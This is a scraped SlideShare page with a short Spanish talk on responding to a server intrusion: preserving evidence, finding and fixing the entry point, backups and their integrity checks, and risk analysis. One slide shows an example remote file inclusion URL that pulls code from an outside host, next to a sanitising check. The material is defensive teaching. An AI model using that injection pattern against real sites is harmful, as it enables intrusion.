SlideShare una empresa de Scribd logo
1 de 10
 
Índice ,[object Object],[object Object],[object Object]
¿Por que yo? ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Que hacer Ver por donde...  Sin reiniciar, NI apagar el servidor. Útil tener logs del servidor, información de trafico red,  histórico comandos, cualquier cosa..... Que hayan dejado Tras identificar por donde,  ver el como resolver o evitar la intrusión  (aka minimizar) Restaurar copia seguridad
Que hacer Ftp, correo, cambio password  Solventar fallo aplicación, Inyección codigo (htm, php, asp), o de  Sql...  Intentar sanear valores de variables. http://loco.com/index.php?zone=http://injeccion.com if(eregi(“ ^http ”,$zone.var)) then ….. ¿Actualizar sistema....? ¿Aplicaciones...?
Que habia que haber hecho Backups, backups y  backups ¿Comprimir..., cintas...? ¿Un día....? Ficheros, bases de datos…. Política recurrente... “hasta el infinito y mas alla” Hay mejores alternativas...  ¿snapshots, filesystems…?
Que habia que haber hecho Validación integridad backups ¿Que es eso?  Numero de veces al año…  ( según periodicidad ) Entorno test o desarrollo,  NUNCA  en producción
Que habia que haber hecho Realizar análisis riesgos.   LOPD, SGSI (aka iso-27000) ….. Securizacion servidor, servicios y aplicaciones Logs hacia servidor interno no accesible
Que había que haber hecho ,[object Object],[object Object],[object Object],[object Object],[object Object]
Preguntas…. Gracias a todos  por vuestro tiempo e interes . Julio García [email_address]

Más contenido relacionado

La actualidad más candente

Permisos de archivo
Permisos de archivoPermisos de archivo
Permisos de archivo
jarx75
 
Convertir un documento en mht a 33
Convertir un documento en mht a 33Convertir un documento en mht a 33
Convertir un documento en mht a 33
jeanyo21
 
Instalarspotify
InstalarspotifyInstalarspotify
Instalarspotify
javism10
 
Tutorial Comandos
Tutorial ComandosTutorial Comandos
Tutorial Comandos
eguzman
 

La actualidad más candente (18)

Uso de John the Ripper
Uso de John the RipperUso de John the Ripper
Uso de John the Ripper
 
Permisos de archivo
Permisos de archivoPermisos de archivo
Permisos de archivo
 
Windows 2 practica 01 - introduccion a cmd
Windows 2   practica 01 - introduccion a cmdWindows 2   practica 01 - introduccion a cmd
Windows 2 practica 01 - introduccion a cmd
 
Estructura de linux
Estructura de linuxEstructura de linux
Estructura de linux
 
Unidad 6: Flujos y Archivos Ejercicio 4
Unidad 6: Flujos y Archivos Ejercicio 4Unidad 6: Flujos y Archivos Ejercicio 4
Unidad 6: Flujos y Archivos Ejercicio 4
 
Actividad 1 sistemas
Actividad 1 sistemasActividad 1 sistemas
Actividad 1 sistemas
 
Tarea 1isidro
Tarea 1isidroTarea 1isidro
Tarea 1isidro
 
Pendrive Linux
Pendrive LinuxPendrive Linux
Pendrive Linux
 
Convertir un documento en mht a 33
Convertir un documento en mht a 33Convertir un documento en mht a 33
Convertir un documento en mht a 33
 
Script Y Comandos De Linux
Script Y Comandos De LinuxScript Y Comandos De Linux
Script Y Comandos De Linux
 
Permisos de archivos
Permisos de archivosPermisos de archivos
Permisos de archivos
 
COMANDO DE BUSQUEDA- GREP
COMANDO DE BUSQUEDA- GREPCOMANDO DE BUSQUEDA- GREP
COMANDO DE BUSQUEDA- GREP
 
Segundo seminario spss
Segundo seminario spssSegundo seminario spss
Segundo seminario spss
 
Permiso de archivos
Permiso de archivosPermiso de archivos
Permiso de archivos
 
Open Solaris Multimedia
Open Solaris MultimediaOpen Solaris Multimedia
Open Solaris Multimedia
 
Manejo de archivos y carpetas :)
Manejo de archivos y carpetas :)Manejo de archivos y carpetas :)
Manejo de archivos y carpetas :)
 
Instalarspotify
InstalarspotifyInstalarspotify
Instalarspotify
 
Tutorial Comandos
Tutorial ComandosTutorial Comandos
Tutorial Comandos
 

Destacado (8)

Diccionario de-hebreo-biblico-by-moises-chavez
Diccionario de-hebreo-biblico-by-moises-chavezDiccionario de-hebreo-biblico-by-moises-chavez
Diccionario de-hebreo-biblico-by-moises-chavez
 
Fashiolista
FashiolistaFashiolista
Fashiolista
 
Easter week
Easter weekEaster week
Easter week
 
Presentación tipos de consulas copia
Presentación tipos de consulas  copiaPresentación tipos de consulas  copia
Presentación tipos de consulas copia
 
Dancing generation
Dancing generationDancing generation
Dancing generation
 
Template To Music Video
Template To Music VideoTemplate To Music Video
Template To Music Video
 
Rules for crossing over 4 27-11a
Rules for crossing over 4 27-11aRules for crossing over 4 27-11a
Rules for crossing over 4 27-11a
 
God is great
God is greatGod is great
God is great
 

Similar a Ante una intrusión ¿qué hacer?

3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss
Sykrayo
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
Conferencias FIST
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
Luis Cortes Zavala
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
Dianaarellano16
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
Dianaarellano16
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
RootedCON
 

Similar a Ante una intrusión ¿qué hacer? (20)

3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
FIT 2018 - Malware Avanzado y Respuesta a Incidentes
FIT 2018 - Malware Avanzado y Respuesta a IncidentesFIT 2018 - Malware Avanzado y Respuesta a Incidentes
FIT 2018 - Malware Avanzado y Respuesta a Incidentes
 
Webinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con AutopsyWebinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con Autopsy
 
Flash player security
Flash player securityFlash player security
Flash player security
 
Windows
WindowsWindows
Windows
 
Webinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a LinuxWebinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a Linux
 
Archivos Por Lotes Arch Log
Archivos Por Lotes Arch LogArchivos Por Lotes Arch Log
Archivos Por Lotes Arch Log
 
Archivos Por Lotes Arch Log
Archivos Por Lotes Arch LogArchivos Por Lotes Arch Log
Archivos Por Lotes Arch Log
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
 
Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.Sistema operativo d.f.s.o.
Sistema operativo d.f.s.o.
 
2 power point
2 power point2 power point
2 power point
 
Analaisis de malwatre trickbot - mp alonso
Analaisis de malwatre   trickbot - mp alonsoAnalaisis de malwatre   trickbot - mp alonso
Analaisis de malwatre trickbot - mp alonso
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Log Management
Log ManagementLog Management
Log Management
 
Introducción a los servidores Linux
Introducción a los servidores LinuxIntroducción a los servidores Linux
Introducción a los servidores Linux
 

Más de Eventos Creativos

Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03
Eventos Creativos
 

Más de Eventos Creativos (20)

La informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y MicrosoftLa informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y Microsoft
 
Windows server 2012 para it
Windows server 2012 para itWindows server 2012 para it
Windows server 2012 para it
 
Pentesting con metasploit framework
Pentesting con metasploit frameworkPentesting con metasploit framework
Pentesting con metasploit framework
 
Malware en android
Malware en androidMalware en android
Malware en android
 
Despliegue empresarial de smartphones mdm
Despliegue empresarial de smartphones   mdmDespliegue empresarial de smartphones   mdm
Despliegue empresarial de smartphones mdm
 
Atacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnetAtacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnet
 
Ataque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil FocaAtaque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil Foca
 
Windows 8
Windows 8Windows 8
Windows 8
 
Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03
 
Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02
 
Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01
 
Análisis forense de dispositivos ios
Análisis forense de dispositivos iosAnálisis forense de dispositivos ios
Análisis forense de dispositivos ios
 
Arquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en iosArquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en ios
 
Jailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivoJailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivo
 
I os en el entorno corporativo
I os en el entorno corporativoI os en el entorno corporativo
I os en el entorno corporativo
 
Análisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etcAnálisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etc
 
Lo que las apps esconden
Lo que las apps escondenLo que las apps esconden
Lo que las apps esconden
 
Firma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móvilesFirma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móviles
 
Nfc en móviles
Nfc en móvilesNfc en móviles
Nfc en móviles
 
Fraude en tecnológias móviles
Fraude en tecnológias móvilesFraude en tecnológias móviles
Fraude en tecnológias móviles
 

Último

Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
AnnimoUno1
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
FagnerLisboa3
 

Último (15)

Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
 
Presentación de elementos de afilado con esmeril
Presentación de elementos de afilado con esmerilPresentación de elementos de afilado con esmeril
Presentación de elementos de afilado con esmeril
 
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdfRefrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
presentacion de PowerPoint de la fuente de poder.pptx
presentacion de PowerPoint de la fuente de poder.pptxpresentacion de PowerPoint de la fuente de poder.pptx
presentacion de PowerPoint de la fuente de poder.pptx
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptxEL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
 

Ante una intrusión ¿qué hacer?

  • 1.  
  • 2.
  • 3.
  • 4. Que hacer Ver por donde... Sin reiniciar, NI apagar el servidor. Útil tener logs del servidor, información de trafico red, histórico comandos, cualquier cosa..... Que hayan dejado Tras identificar por donde, ver el como resolver o evitar la intrusión (aka minimizar) Restaurar copia seguridad
  • 5. Que hacer Ftp, correo, cambio password Solventar fallo aplicación, Inyección codigo (htm, php, asp), o de Sql... Intentar sanear valores de variables. http://loco.com/index.php?zone=http://injeccion.com if(eregi(“ ^http ”,$zone.var)) then ….. ¿Actualizar sistema....? ¿Aplicaciones...?
  • 6. Que habia que haber hecho Backups, backups y backups ¿Comprimir..., cintas...? ¿Un día....? Ficheros, bases de datos…. Política recurrente... “hasta el infinito y mas alla” Hay mejores alternativas... ¿snapshots, filesystems…?
  • 7. Que habia que haber hecho Validación integridad backups ¿Que es eso?  Numero de veces al año… ( según periodicidad ) Entorno test o desarrollo, NUNCA en producción
  • 8. Que habia que haber hecho Realizar análisis riesgos. LOPD, SGSI (aka iso-27000) ….. Securizacion servidor, servicios y aplicaciones Logs hacia servidor interno no accesible
  • 9.
  • 10. Preguntas…. Gracias a todos por vuestro tiempo e interes . Julio García [email_address]

Notas del editor

  1. Peacemaker monitoriza servicios